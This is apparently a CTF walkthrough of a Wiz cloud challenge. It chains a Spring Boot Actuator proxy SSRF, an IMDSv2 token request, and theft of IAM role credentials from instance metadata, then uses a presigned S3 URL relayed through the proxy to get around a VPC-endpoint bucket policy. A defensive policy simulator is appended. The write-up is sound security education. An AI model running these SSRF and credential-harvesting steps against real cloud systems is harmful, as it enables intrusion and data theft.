Wiz 2025 Challenge: From a Spring Actuator Leak to Retrieving Sensitive Files from S3, a Full Walkthrough
Background

After several weeks of exploitation and privilege escalation, you have gained access to what you hope is the final server, which you can then use to extract the secret flag from an S3 bucket. But it won't be easy: the target uses an AWS data perimeter to restrict access to the bucket's contents. You've discovered a Spring Boot Actuator application running on AWS:

```
curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com
{"status":"UP"}
```

Solving process

Spring Boot Actuator leak

First, some analysis. The flag must be in the bucket, and since the challenge says our bucket has been restricted, anonymous access probably won't work, but it is still worth a try. Anonymous access needs the bucket name, and since the challenge already tells us this is a Spring Boot Actuator, we can obviously look at the env endpoint. Then try to list the bucket:

```
user@monthly-challenge:~$ aws s3 ls s3://challenge01-470f711/ --no-sign-request
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
```

No luck, no permission, so we have to go looking for credentials. My first thought was the instance metadata service, but there was no response:

```
curl http://169.254.169.254/latest/meta-data
```

Presumably this shell is not on an EC2 instance. So the next step is hunting for credentials; tools such as truffleHog can help. A quick search:

```
user@monthly-challenge:/$ grep -ri --exclude-dir={/proc,/sys,/dev,/run,/snap,/var/lib/docker} "Secret Access Key" /
```

The only matches were documentation strings inside the botocore service definitions bundled with the AWS CLI under /usr/local/aws-cli/ (output omitted).
Nothing turned up in the usual places for credential collection, so the only option was to keep working on the Spring side following the hint. I bulk-fuzzed the Actuator endpoints to see if anything exploitable was exposed, then extracted all the routes from the mappings endpoint and spotted a proxy route. That must be what is used to reach the metadata service; metadata bypasses generally come down to an SSRF vulnerability:

```
user@monthly-challenge:/$ curl 'https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/'
HTTP error: 401 Unauthorized
```

At least the metadata endpoint is reachable now; it only refuses because IMDSv2 is enforced. So we first obtain a token with a PUT request:

```
user@monthly-challenge:/$ curl -X PUT \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
  'https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/api/token'
AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q
```

We got a token, so now try reading the metadata with it:

```
user@monthly-challenge:/$ curl -H "X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q" \
  'https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/'
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
system
```

That works, so we read the credential information:

```
user@monthly-challenge:/$ curl -H "X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q" \
  'https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
challenge01-5592368
```

Then fetch the credentials of that role:

```
user@monthly-challenge:/$ curl -H "X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q" \
  'https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/challenge01-5592368'
{
  "Code" : "Success",
  "LastUpdated" : "2025-07-10T13:26:52Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIARK***WELX36",
  "SecretAccessKey" : "PsrjWrAANNHBG3n***NmUHVglREBV",
  "Token" : "IQoJb3JpZ2luX2VjELb//////////wEaCXVzLWVhc3QtMSJHMEUCIC6AH4pBiUXSj7Xih2aQvR3LmiwIQ8TeLO6Gv2iotAiEAi6CjgMDpky/IC6HpBwzG52L/EDfizjGUTaX/5YP4KcqwQUIv///////////ARAAGgwwOTIyOTc4NTEzNzQiDGpyJeQycy6B9rX9XiqVBYrNoqFyWFZz/IuhF6PqC8iDwPJ9uFspInzbcKaJ86Qx1issOwpJUdXyIUaYjLrJhdklRXKoSNxR/K/F2TOGOM/YPt/NBZkVtbz*** (redacted)",
  "Expiration" : "2025-07-10T19:47:29Z"
}
```

With these we can configure a profile:

```
root@hcss-ecs-0d0e:~# aws configure set aws_access_key_id ASIARK7LBO**EXWELX36 --profile challenge01
root@hcss-ecs-0d0e:~# aws configure set aws_secret_access_key PsrjWrAANNHBG3ngmwQXdCdc******mUHVglREBV --profile challenge01
root@hcss-ecs-0d0e:~# aws configure set aws_session_token <session token from the metadata response> --profile challenge01
```

After that we hold this principal's permissions.

Locating the target file

First, let's check which bucket permissions this principal has, starting with the current identity:

```
root@hcss-ecs-0d0e:~# aws sts get-caller-identity --profile challenge01
{
    "UserId": "AROARK7LBOHXDP2J2E3DV:i-0bfc4291dd0acd279",
    "Account": "092297851374",
    "Arn": "arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279"
}
```

Then look at the attached policies:

```
root@hcss-ecs-0d0e:~# aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 \
  --action-names s3:ListBucket s3:GetObject s3:PutObject s3:DeleteObject s3:ListAllMyBuckets \
  --profile challenge01
An error occurred (AccessDenied) when calling the SimulatePrincipalPolicy operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: iam:SimulatePrincipalPolicy on resource: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 because no identity-based policy allows the iam:SimulatePrincipalPolicy action
```

Unfortunately this principal lacks that permission, so we list directly:

```
root@hcss-ecs-0d0e:~# aws s3 ls --profile challenge01
An error occurred (AccessDenied) when calling the ListBuckets operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: s3:ListAllMyBuckets because no identity-based policy allows the s3:ListAllMyBuckets action
```

No permission to list buckets, but we already know the bucket name:

```
root@hcss-ecs-0d0e:~# aws s3 ls s3://challenge01-470f711/ --recursive --profile challenge01
2025-06-19 01:15:24         29 hello.txt
2025-06-17 06:01:49         51 private/flag.txt
```

Bypassing the read restriction

Unfortunately, reading the file fails:

```
root@hcss-ecs-0d0e:~# aws s3 cp s3://challenge01-470f711/private/flag.txt - --profile challenge01
download failed: s3://challenge01-470f711/private/flag.txt to - An error occurred (403) when calling the HeadObject operation: Forbidden
```

No read permission, so we still need to look at the bucket policy:

```
root@hcss-ecs-0d0e:~# aws s3api get-bucket-policy --bucket challenge01-470f711 --profile challenge01
{
    "Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Deny\",\"Principal\":\"*\",\"Action\":\"s3:GetObject\",\"Resource\":\"arn:aws:s3:::challenge01-470f711/private/*\",\"Condition\":{\"StringNotEquals\":{\"aws:SourceVpce\":\"vpce-0dfd8b6aa1642a057\"}}}]}"
}
```

The restriction is that only requests arriving through the specified VPC endpoint (VPCe) may access the objects; anything else is denied even if the identity has permission. What now? Clever GPT gave the answer, and it also reminded me of the proxy:

```
root@hcss-ecs-0d0e:~# curl 'https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://s3.amazonaws.com/challenge01-470f711/private/flag.txt'
HTTP error: 403 Forbidden
```

But the result is still blocked. Perhaps the proxy is not in the VPC; we could verify that, but since the metadata reads just now all succeeded, it most likely is. No choice but to ask a good friend for help. First, you need to understand SigV4 signing: in AWS, when accessing a private resource such as an S3 object, AWS requires your request to be signed. Reference: https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html

By default, all Amazon S3 objects are private; only the object owner has permission to access them. The object owner can, however, share an object with others by creating a presigned URL. A presigned URL uses security credentials to grant time-limited permission to download the object. The URL can be entered in a browser or used by a program to download the object. The credentials used by the presigned URL are those of the AWS user who generated it.

So we need a presigned URL: https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/using-presigned-url.html

When creating a presigned URL you must provide your security credentials and then specify: an Amazon S3 bucket; an object key (when downloading, the object in your bucket; when uploading, the file name it will have once uploaded); the HTTP method (GET to download the object, PUT to upload, HEAD to read object metadata, and so on); and an expiration interval.

Following that, we run the command directly and generate the signed URL below:

```
root@hcss-ecs-0d0e:~# aws s3 presign s3://challenge01-470f711/private/flag.txt --profile challenge01 --expires-in 3600
https://challenge01-470f711.s3.amazonaws.com/private/flag.txt?AWSAccessKeyId=ASIARK7LBOHXEXWELX36&Signature=WT7zPvNKLF6zr%2Fi4%2FGvqpJHoZzs%3D&x-amz-security-token=IQoJb3JpZ2luX2VjELb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIC6AH%2B4pBi%2BUXSj7Xih2aQvR3LmiwIQ8TeL%2BO6Gv2iotAiEAi6CjgMDpky%2FIC6HpBwzG52L%2FED%2BfizjGUTaX%2F5YP4KcqwQUIv... (session token truncated)&Expires=1752171219
```

Then I took this signed URL to the proxy, but the content kept getting truncated, which was annoying, so I percent-encoded the whole URL and requested it again:
```
root@hcss-ecs-0d0e:~# curl 'https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=<percent-encoded presigned URL>'
The flag is: ********
```

Success.

Summary

All in all, this was a challenge with real practical value, and the whole chain of cause and effect is very coherent: get the bucket name; anonymous access fails; obtain the configuration information; the metadata service cannot be reached directly; go through the proxy (the mappings endpoint leaks the proxy route); bypass the IMDSv2 protection on the metadata; obtain the identity's credentials and check its permissions; list the file location; the VPC restriction brings the proxy back to mind; the proxy alone gets a 403; think of a presigned URL to grant access. Smooth as flowing water.
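The policy evaluation behind the four results above (ls allowed, cp denied, unsigned fetch through the proxy denied, presigned fetch through the proxy allowed), as an added example that is not part of the original write-up: a small Python simulator of the bucket policy's Deny statement. It assumes the instance role's identity policy grants s3:ListBucket and s3:GetObject on the bucket (ROLE_ALLOWS; the page never shows that policy), and the request contexts are constructed. The point for defenders is that aws:SourceVpce gates on the network path of the request, not on who signed it, so a signed request relayed by any component inside the VPC passes the condition.

```python
"""Simulate how the challenge's bucket policy decides the requests in the write-up.

Added example, not code from the original post. It implements only the slice of
IAM evaluation needed here: an explicit Deny from the bucket policy wins, then an
identity-based Allow is checked. Request contexts below are constructed.
"""
import fnmatch
import json

# Bucket policy exactly as returned by get-bucket-policy in the write-up.
BUCKET_POLICY = json.loads("""
{"Version": "2012-10-17",
 "Statement": [{"Effect": "Deny", "Principal": "*", "Action": "s3:GetObject",
                "Resource": "arn:aws:s3:::challenge01-470f711/private/*",
                "Condition": {"StringNotEquals":
                              {"aws:SourceVpce": "vpce-0dfd8b6aa1642a057"}}}]}
""")

# Assumption: the instance role's identity policy grants these actions on the
# bucket. The page only shows that ListBucket worked and ListAllMyBuckets did
# not; GetObject is assumed because the presigned GET ultimately succeeded.
ROLE_ALLOWS = {"s3:ListBucket", "s3:GetObject"}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _condition_matches(condition, ctx):
    """StringEquals / StringNotEquals as IAM evaluates them: a negated operator
    also matches when the context key is absent (no VPC endpoint on the path)."""
    for operator, pairs in condition.items():
        if operator not in ("StringEquals", "StringNotEquals"):
            raise NotImplementedError(operator)
        for key, expected in pairs.items():
            actual = ctx.get(key)
            if operator == "StringEquals" and actual != expected:
                return False
            if operator == "StringNotEquals" and actual == expected:
                return False
    return True


def _statement_applies(stmt, action, resource, ctx):
    if not any(fnmatch.fnmatchcase(action, a) for a in _as_list(stmt["Action"])):
        return False
    if not any(fnmatch.fnmatchcase(resource, r) for r in _as_list(stmt["Resource"])):
        return False
    return _condition_matches(stmt.get("Condition", {}), ctx)


def evaluate(action, resource, ctx, signed=True, policy=BUCKET_POLICY):
    """Return 'ALLOW', 'DENY:explicit' or 'DENY:implicit' for one request.
    signed=False models the unsigned URL the proxy fetched on its own, which
    carries no principal and therefore no identity-based Allow."""
    for stmt in policy["Statement"]:
        if stmt["Effect"] == "Deny" and _statement_applies(stmt, action, resource, ctx):
            return "DENY:explicit"
    if signed and action in ROLE_ALLOWS:
        return "ALLOW"
    return "DENY:implicit"


FLAG = "arn:aws:s3:::challenge01-470f711/private/flag.txt"
BUCKET = "arn:aws:s3:::challenge01-470f711"
IN_VPC = {"aws:SourceVpce": "vpce-0dfd8b6aa1642a057"}  # relayed by the in-VPC proxy
OUTSIDE = {}                                           # sent from the attacker's own host

if __name__ == "__main__":
    print(evaluate("s3:ListBucket", BUCKET, OUTSIDE))             # ALLOW (aws s3 ls --recursive)
    print(evaluate("s3:GetObject", FLAG, OUTSIDE))                # DENY:explicit (403 on cp)
    print(evaluate("s3:GetObject", FLAG, IN_VPC, signed=False))   # DENY:implicit (proxy, unsigned)
    print(evaluate("s3:GetObject", FLAG, IN_VPC))                 # ALLOW (presigned URL via proxy)
```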